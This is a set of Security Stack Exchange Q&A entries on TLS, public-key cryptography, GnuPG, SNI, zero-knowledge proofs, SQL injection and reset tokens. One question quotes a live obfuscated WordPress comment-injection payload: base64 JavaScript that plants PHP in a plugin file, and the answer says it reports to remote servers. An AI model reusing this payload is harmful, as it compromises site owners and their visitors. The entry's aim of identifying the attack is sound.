86,567
If I am communicating over a secure line (secured using SSL or TLS) and I send the server a message, could someone eavesdropping tell what that message was if they knew beforehand a list of messages I am likely to send? E.g. I send a message saying "Execute order 66" over a secure line. Someone eavesdropping suspected that I was going to send this order. Could they verify that I just sent that specific message by comparing the sent message with the same message encrypted with the same public key?
No. SSL encrypts the message with a symmetric key negotiated during the handshake, so an attacker is unable to decrypt the message he has just captured, nor can he reproduce the ciphertext by encrypting his guess with the server's public key. However, SSL is vulnerable to a traffic analysis attack. E.g. suppose you have two messages of very different lengths, like "Execute order 66" and "This is a very very very very very very very very very very very very very very very very very very very very long message". If the attacker knows that the message has to be one of the two, then based on the length of the encrypted message he will know which message you sent out. More info on traffic analysis attacks: http://webcache.googleusercontent.com/search?q=cache:KKy5MbfirYkJ:https://www.cs.berkeley.edu/~daw/teaching/cs261-f98/projects/final-reports/ronathan-heyning.ps+&cd=4&hl=en&ct=clnk&gl=us
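To make the length leak concrete, here is a minimal sketch assuming Python with the third-party cryptography package. It encrypts the two candidate messages with AES-GCM, the kind of symmetric cipher a TLS session typically uses; the key, nonce and messages are stand-ins. The point is only that ciphertext length tracks plaintext length, so an observer who knows the candidate messages can tell them apart without decrypting anything.

```python
# Sketch: ciphertext length reveals which of two known candidate messages was
# sent, even though the eavesdropper cannot decrypt either one.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)   # session key, unknown to the attacker
aead = AESGCM(key)

candidates = [
    b"Execute order 66",
    b"This is a very very very very very very very very long message",
]

observed = aead.encrypt(os.urandom(12), candidates[0], None)  # what the attacker captures

# The attacker only compares lengths (GCM adds a fixed 16-byte tag).
for msg in candidates:
    if len(msg) + 16 == len(observed):
        print("Probably sent:", msg)
```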
{ "source": [ "https://security.stackexchange.com/questions/86567", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46851/" ] }
86,595
As the title suggests, I am curious to know why you can't work backwards using a message, public key and encrypted message to work out how to decrypt the message! I don't understand how a message can be encrypted using a key and then how you cannot work backwards to "undo" the encryption?
There are one-way functions in computer science (not mathematically proven to exist, but you will be rich and famous if you prove otherwise). These functions are easy to compute in one direction but hard to reverse. E.g. it is easy for you to compute 569 * 757 * 911 = 392397763 in a minute or two on a piece of paper. On the other hand, if I gave you 392397763 and asked you to find the prime factors, you would have a very hard time. Now if these numbers are really big, even the fastest computer in the world will not be able to recover the factorization in a reasonable time. In public-key cryptography these one-way functions are used in clever ways to allow somebody to use the public key to encrypt something, while making it very hard to decrypt the resulting message without the private key. You should read the Wikipedia article on the RSA cryptosystem.
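A minimal sketch of that asymmetry in Python: multiplying the factors is instant, while recovering them by brute-force trial division already takes measurably longer, and becomes hopeless once the factors are hundreds of digits long (the numbers here are the toy values from the answer, not real key sizes).

```python
# Forward direction: multiplying known primes is trivial.
# Backward direction: recovering the primes by trial division is much slower,
# and infeasible for the sizes used in real public-key cryptography.
import time

p, q, r = 569, 757, 911
n = p * q * r
print(n)  # 392397763

def trial_factor(n: int) -> list[int]:
    """Recover prime factors by brute-force trial division."""
    factors, d = [], 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    if n > 1:
        factors.append(n)
    return factors

start = time.perf_counter()
print(trial_factor(392397763), f"{time.perf_counter() - start:.4f}s")
```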
{ "source": [ "https://security.stackexchange.com/questions/86595", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72982/" ] }
86,692
I was somewhat surprised that the sysadmin approved a one-letter username like "m", and my username is also short ("nik"). I think that if usernames can be brute-force attacked, then the username should also be longer than just a few characters. Do you agree?
The username is not a secret; any determined attacker will be able to find out the names of users on your system. What does improve your security is having no remote access for "root", "guest", and similar account names found on many systems. In fact, Ubuntu explicitly disables the "root" account because it is such a favorite target.
{ "source": [ "https://security.stackexchange.com/questions/86692", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4334/" ] }
86,721
Can I do something like: gpg --public-key my.pub -e file.txt If I can, is there any reason that I should not do that? P.S.: I think I don't need to know about the recipient because my machine only has one public key at a time. But that key will change soon (and I can delete all the old encrypted files, so there is no need to keep them).
GnuPG does not support encrypting to a recipient specified by a key file. The key must be imported in advance, and the recipient defined by either his mail address or key ID. I'd recommend using the cleaner approach expected by GnuPG: hard-code either the key's fingerprint or a user ID given by that key, and import it as usual. If you really do not want to import the key, you could do the following as a workaround (which actually imports the key, but into a temporary GnuPG home directory):

1. Import the key into a temporary folder, for example using gpg --homedir /tmp/gnupg --import my.pub
2. Determine the key ID of the key stored in the file: KEYID=`gpg --list-public-keys --batch --with-colons --homedir /tmp/gnupg | head -n1 | cut -d: -f5`
3. Encrypt a message to the recipient: gpg --homedir /tmp/gnupg --recipient ${KEYID} --encrypt
4. Clean up the temporary GnuPG home directory: rm -rf /tmp/gnupg

You could of course save this as a script to make using it more convenient.
{ "source": [ "https://security.stackexchange.com/questions/86721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73085/" ] }
86,723
I'm having a little bit of trouble understanding why the HTTPS protocol includes the host name in plain text. I have read that the host name and IP addresses of an HTTPS packet are not encrypted. Why can't the host name be encrypted? Can't we just leave the destination IP in plain text (so the packet is routable), and then when the packet arrives at the destination server, the packet is decrypted and the host/index identified from the header? Maybe the problem is that there can be different certs for one particular destination IP (different certs for different subdomains?), so the destination server cannot decrypt the packet until it arrives at the correct host within that server. Does this make ANY sense, or am I way off?
The hostname is included in the initial SSL handshake to support servers which have multiple host names (with different certificates) on the same IP address (SNI: Server Name Indication). This is similar to the Host header in plain HTTP requests. The name is included in the first message from the client (ClientHello), that is, before any identification and key exchange is done, so that the server can offer the correct certificate for identification. While encrypting the hostname would be nice, the question is which key to use for that encryption. The key exchange comes only after identification of the site by certificate, because otherwise you might exchange keys with a man-in-the-middle. But identification with certificates already needs the hostname so that the server can offer the matching certificate. So encryption of the hostname would need to be done with a key either based on some other kind of identification or in a way that is not safe against a man-in-the-middle. There could be ways to protect the hostname in the SSL handshake, but at the cost of additional overhead in the handshake and infrastructure. There are ongoing discussions about whether and how to include encrypted SNI in TLS 1.3. I suggest you have a look at this presentation and the IETF TLS mailing list. Apart from that, leakage of the hostname can also occur by other means, like the preceding DNS lookup for the name. And of course the certificate sent in the server's response is not encrypted either (same problem, no key yet), so one can extract the requested target from the server's response. There are lots of sites out there which will not work without SNI, like all of Cloudflare's free SSL offering. If such a site is accessed by a client not supporting SNI (like IE8 on Windows XP), this will result in either the wrong certificate being served or an SSL handshake error like 'unknown_name'.
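As an illustration, here is a minimal sketch using Python's standard ssl module (the hostname is a placeholder). The value passed as server_hostname ends up in the SNI extension of the ClientHello, and it travels in the clear so the server can pick the matching certificate before any keys exist.

```python
# Sketch: the SNI value is supplied by the client at connection time and is
# visible to a passive observer on the wire.
import socket
import ssl

hostname = "example.com"   # hypothetical target host
ctx = ssl.create_default_context()

with socket.create_connection((hostname, 443)) as tcp:
    # server_hostname populates the SNI extension of the ClientHello.
    with ctx.wrap_socket(tcp, server_hostname=hostname) as tls:
        print(tls.version(), tls.getpeercert()["subject"])
```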
{ "source": [ "https://security.stackexchange.com/questions/86723", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69190/" ] }
86,766
I received an email for my WordPress site, where the comment section is disabled. This was the email: "Author: google (IP: 210.56.50.40, 210.56.50.40) Email: [email protected] URL: http://spider.google.com Who is?: http://whois.arin.net/rest/ip/210.56.50.40 Comment: Welcome to WordPress. This is your first post. [<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGU uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla V05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1amFHbHVZUzEwYjNWNWFXNW5hbWt1WTI5dEx5YzdDaUFnSUNBa2VpQTlJSE4wY2w5eVpYQnNZV05sS0NkM2NDMWpiMjUwWlc1MEwzQnNkV2RwYm5NdmFHVnNiRzh1Y0dod0p5d25KeXdrWDFORlVsWkZVbHNpVWtWUlZVVlRWRjlWVWtraVhTazdDaUFnSUNBa2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q2lBZ0lDQnphSFZtWm14bEtDUnlaV05wZG1WeWN5azdDaUFnSUNCbWIzSmxZV05vS0NSeVpXTnBkbVZ5Y3lCaGN5QWtkQ2w3Q2lBZ0lDQWdJQ0FnWldOb2J5QW5QR2x0WnlCM2FXUjBhRDB4SUdobGFXZG9kRDB4SUhOeVl6MGlKeUF1SkhRZ0xpQW5QMlJoZEdFOUp5QXVKSEpsY0c5eWRDNG5JajRuT3dvZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCeVpXMXZkbVZmWTI5dGJXVnVkQ2dwZXdvZ0lDQWdhVzVqYkhWa1pWOXZibU5sS0NjdUxpOHVMaTkzY0MxamIyNW1hV2N1Y0dod0p5azdDZ29nSUNBZ0pHTnZiaUE5SUcxNWMzRnNYMk52Ym01bFkzUW9SRUpmU0U5VFZDeEVRbDlWVTBWU0xFUkNYMUJCVTFOWFQxSkVLVHNLSUNBZ0lHMTVjM0ZzWDNObGJHVmpkRjlrWWloRVFsOU9RVTFGTENBa1kyOXVLVHNLQ2lBZ0lDQWtlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXM 
WxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSUNBZ0lDUnlJRDBnYlhsemNXeGZjWFZsY25rb0pIcGhjSEp2Y3lrN0NpQWdJQ0J0ZVhOeGJGOWpiRzl6WlNna1kyOXVLVHNLZlFvS1puVnVZM1JwYjI0Z2NHRjBZMmhmZDNBb0tYc0tJQ0FnSUNSbWJtRnRaU0E5SUNjdUxpOHVMaTkzY0MxamIyMXRaVzUwY3kxd2IzTjBMbkJvY0NjN0NpQWdJQ0JwWmlobWFXeGxYMlY0YVhOMGN5Z2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWtkQ0E5SUNjOFAzQm9jQ0JrYVdVb0tUc2dQejRuSUM0Z1VFaFFYMFZQVERzS0NpQWdJQ0FnSUNBZ0pIUnBiV1VnUFNCbWFXeGxiWFJwYldVb0pHWnVZVzFsS1RzS0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUdaaGJITmxPd29LSUNBZ0lDQWdJQ0JwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ0FnSUNBa2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUhSeWRXVTdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29nSUNBZ0lDQWdJR2xtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWdJQ0FnSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aG JXVXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2RHMXdJRDBnSkhRZ0xpQWtkRzF3T3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCcFppQW9jM1J5YkdWdUtDUjBiWEFwSUQ0Z01UQXBld29LSUNBZ0lDQWdJQ0FnSUNBZ0pHWWdQU0JtYjNCbGJpZ2tabTVoYldVc0luY2lLVHNLSUNBZ0lDQWdJQ0FnSUNBZ1puQjFkSE1vSkdZc0pIUnRjQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWmpiRzl6WlNna1ppazdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29LSUNBZ0lDQWdJQ0JwWmlBb0pIZHlhWFFwZXdvZ0lDQWdJQ0FnSUNBZ0lDQm1iM0lvSkdrOWMzUnliR1Z1S0NSd1pYSnRLUzB4T3lScFBqMHdPeTB0SkdrcGV3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pIQmxjbTF6SUNzOUlDaHBiblFwSkhCbGNtMWJKR2xkS25CdmR5ZzRMQ0FvYzNSeWJHVnVLQ1J3WlhKdEtTMGthUzB4S1NrN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd29nSUNBZ0lDQWdJSDBLQ2lBZ0lDQWdJQ0FnUUhSdmRXTm9LQ1JtYm1GdFpTd2tkR2x0WlNrN0NpQWdJQ0I5Q24wS0NtWjFibU4wYVc5dUlITmxiR1pmY21WdGIzWmxLQ2w3Q2lBZ0lDQWtabTVoYldVZ1BTQmZYMFpKVEVWZlh6c0tJQ0FnSUNSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEd GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3 
T3kwdEpHa3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSEJsY20xeklDczlJQ2hwYm5RcEpIQmxjbTFiSkdsZEtuQnZkeWc0TENBb2MzUnliR1Z1S0NSd1pYSnRLUzBrYVMweEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdRR05vYlc5a0tDUm1ibUZ0WlN3a2NHVnliWE1wT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDaUFnSUNCOUNuMEtDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjI1bWFXY3VjR2h3SnpzS0NtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWJtRnRaU2twZXdvS0lDQWdJQ1J5WTJRZ0lEMGdiV1ExS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTNGtYMU5GVWxaRlVsc2lTRlJVVUY5VlUwVlNYMEZIUlU1VUlsMHVjbUZ1WkNnd0xERXdNREF3S1NrN0NpQWdJQ0FrZENBOUlDZHBaaUFvYVhOelpYUW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2twZXlSZlUwVlNWa1ZTVXlBOUlITjBjbkpsZGlna1gxSkZVVlZGVTFSYlhDY25MaVJ5WTJRdUoxd25YU2s3SkY5R1NVeEZJRDBnSkY5VFJWSldSVkpUS0Z3bkpGOWNKeXh6ZEhKeVpYWW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2t1WENjb0pGOHBPMXduS1Rza1gwWkpURVVvYzNSeWFYQnpiR0Z6YUdWektDUmZVa1ZSVlVWVFZGdGNKMGhQVTFSY0oxMHBLVHQ5SnpzS0lDQWdJQ1IwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaUFnSUNBa2MybDZaU 0E5SUdacGJHVnphWHBsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEdGaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSFJ0Y0NBOUlITjBjbDl5WlhCc1lXTmxLQ2NrZEdGaWJHVmZjSEpsWm1sNEp5d2dKSFFnTGlCUVNGQmZSVTlNSUM0Z0p5UjBZV0pzWlY5d2NtVm1hWGduTENBa2RHMXdLVHNLSUNBZ0lDQWdJQ0JwWmlBb2MzUnliR1Z1S0NSMGJYQXBJRDRnTVRBcGV3b0tJQ0FnSUNBZ0lDQWdJQ0FnSkdZZ1BTQm1iM0JsYmlna1ptNWhiV1VzSW5jaUtUc0tJQ0FnSUNBZ0lDQWdJQ0FnWm5CMWRITW9KR1lzSkhSdGNDazdDaUFnSUNBZ0lDQWdJQ0FnSUdaamJHOXpaU2drWmlrN0NpQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b0tJQ0FnSUNBZ0lDQnBaaUFvSkhkeWFYUXBld29nSUNBZ0lDQW dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>] Edit or delete it, then start blogging! " What is this? I already deleted the comment, but I'm curious.
The "Code" is "patching" your WordPress installation (wp-comments-post.php) and sending some information to several servers (probably c&c). Also, it is removing itself from the database. In other words, it is a hack. The email that you get is not from Google Official. It is from a Gmail account. The decoded sources are here: http://pastebin.com/EHgbTGcB http://pastebin.com/YQYgxs3Z The exploit is based on WordPress 3.x persistent script injection: http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection
{ "source": [ "https://security.stackexchange.com/questions/86766", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73050/" ] }
86,823
A ZKP allows proof of knowing the answer to a secret, without actually disclosing what that answer is. Is there any analogy that can help people put this concept into everyday practice? A " lie to children " example is sufficient. For example, Diffie–Hellman has the color mixing analogy, and the padlock metaphor. Is there any real life metaphor, superhero with powers, hero/villain, object, or anything that someone can relate to that would help describe what a ZKP is? My intent is to convert the winning metaphor into an animation that will play on a mobile device as a ZKP is presented. (one animation on the sender side, one on the receiving side)
I heard this example during one of the guest lectures back in grad school. I think it is simple enough, since I've used it myself many times to explain ZKP to people with almost Zero Knowledge of crypto/math. Let's say that I want to convince you that I have a superpower to count the exact number of leaves on a tree within a few seconds. I want to convince you without actually revealing that exact number and without revealing how my superpower works. I can devise a simple protocol: I'll close my eyes and give you the choice to pull off a leaf from that tree. Since it is just a choice, you will either pull one off or you won't. I have no way of knowing whether you did it or not other than quickly counting the leaves again with my superpower. Now when I look at the tree, you'll ask me whether you actually pulled one off or not. If I give you a wrong answer, you'll immediately know that my superpower is fake and so is my knowledge. However, if my answer is right, you might think that I just got lucky, in which case we can repeat the above steps. We can keep repeating these steps to the point where you're satisfied that I actually possess the superpower and that I know the exact number.
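A minimal simulation of why the repetition works (pure Python; everything here is illustrative): a prover who lacks the superpower can only guess whether a leaf was pulled, so the chance of surviving n rounds by luck alone is (1/2)^n.

```python
# Sketch: a cheating prover must guess each round; honest provers always pass,
# cheaters survive n rounds with probability (1/2)**n.
import random

def cheating_prover_survives(rounds: int) -> bool:
    for _ in range(rounds):
        leaf_pulled = random.choice([True, False])  # verifier's secret choice
        guess = random.choice([True, False])        # cheater can only guess
        if guess != leaf_pulled:
            return False                            # caught
    return True

trials = 100_000
for rounds in (1, 5, 10, 20):
    wins = sum(cheating_prover_survives(rounds) for _ in range(trials))
    print(rounds, wins / trials, "expected:", 0.5 ** rounds)
```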
{ "source": [ "https://security.stackexchange.com/questions/86823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/396/" ] }
86,908
I have a web API that connects to my SQL Server using a read-only connection, and I want to allow tech-savvy users of my API to enter an SQL WHERE clause on the query string. I basically just want to tack what they enter onto the select statement. Does a least-privilege (select ability on one table only), read-only connection to the database prevent all injection attacks?
No. You might be confusing SQL injection with data injection; read-only tables do not prevent SQL injection and at best do only a little to limit its impact. SQL injection simply means the ability to inject SQL code. While read-only tables may limit the ability to inject data into the table, they don't impact the ability to:

- Read from other databases or tables if not disallowed
- Read from system tables or run other system queries which are hard to disallow
- Write excessively complex queries that will perform a DoS
- Exfiltrate data using DNS
- Access local files (e.g., utl_file in Oracle)
- Access the DB server's network (e.g., utl_http in Oracle)
- Execute arbitrary code on the server via DB function buffer overflows

See Advanced SQL Injection in Oracle databases for a good walk through all the sorts of things you need to worry about (and realize other databases have their equivalents). If you "basically just want to tack what they enter onto the select statement", then you're expressly permitting the attacker to try any of these. Now, you can certainly do things to limit this. You can disallow quotes and SQL statement separator characters. You can disallow any input that's not [A-Za-z0-9"=] (or the effective equivalent for your database). But if you start going down this path, you're better off writing your application correctly: expose a richer query interface where you offer the keys to be checked, and then perform proper quoting on whatever values the user enters.
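As a minimal sketch of that last suggestion (using Python's built-in sqlite3 as a stand-in for whatever driver talks to your SQL Server, with hypothetical table and column names): whitelist the identifiers you accept, and bind user-supplied values as parameters rather than splicing a raw WHERE clause.

```python
# Sketch: a "richer query interface" that never concatenates user input into SQL.
import sqlite3   # stand-in for any DB-API driver (pyodbc, psycopg2, ...)

ALLOWED_COLUMNS = {"status", "created_at", "customer_id"}

def search(conn, column: str, value: str):
    if column not in ALLOWED_COLUMNS:               # whitelist the identifier
        raise ValueError("unsupported filter column")
    sql = f"SELECT id, status FROM orders WHERE {column} = ?"
    return conn.execute(sql, (value,)).fetchall()   # value is bound, not spliced

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, status TEXT, customer_id TEXT, created_at TEXT)")
conn.execute("INSERT INTO orders VALUES (1, 'open', 'c42', '2015-01-01')")
print(search(conn, "status", "open' OR '1'='1"))    # injection attempt matches nothing
```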
{ "source": [ "https://security.stackexchange.com/questions/86908", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73271/" ] }
86,913
Passwords are hashed so that if someone gains access to a database of passwords then they won't know what the actual passwords are and so they can't log in. If I can get a valid password reset token however (the kind which would be emailed to a user when they've forgotten their password) then isn't this as good as a password? I could take a token, plug it into the reset page and set the password to whatever I want and now I have access. Thus shouldn't password reset tokens also be hashed in the database?
